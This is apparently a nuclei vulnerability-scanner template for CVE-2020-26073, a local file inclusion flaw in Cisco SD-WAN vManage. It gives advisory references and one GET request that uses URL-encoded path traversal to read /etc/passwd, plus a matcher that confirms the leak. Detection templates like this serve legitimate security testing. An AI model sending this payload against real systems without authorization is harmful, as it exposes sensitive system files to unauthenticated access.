nuclei-templates/cves/2020/CVE-2020-26073.yaml

31 lines
942 B
YAML

id: CVE-2020-26073
info:
name: Cisco SD-WAN vManage Software - Local File Inclusion
author: madrobot
severity: high
description: |
Cisco SD-WAN vManage Software in the application data endpoints is vulnerable to local file inclusion which could allow an unauthenticated, remote attacker to gain access to sensitive information.
reference:
- https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-vman-traversal-hQh24tmk.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26073
classification:
cve-id: CVE-2020-26073
tags: cve,cve2020,cisco,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/07/15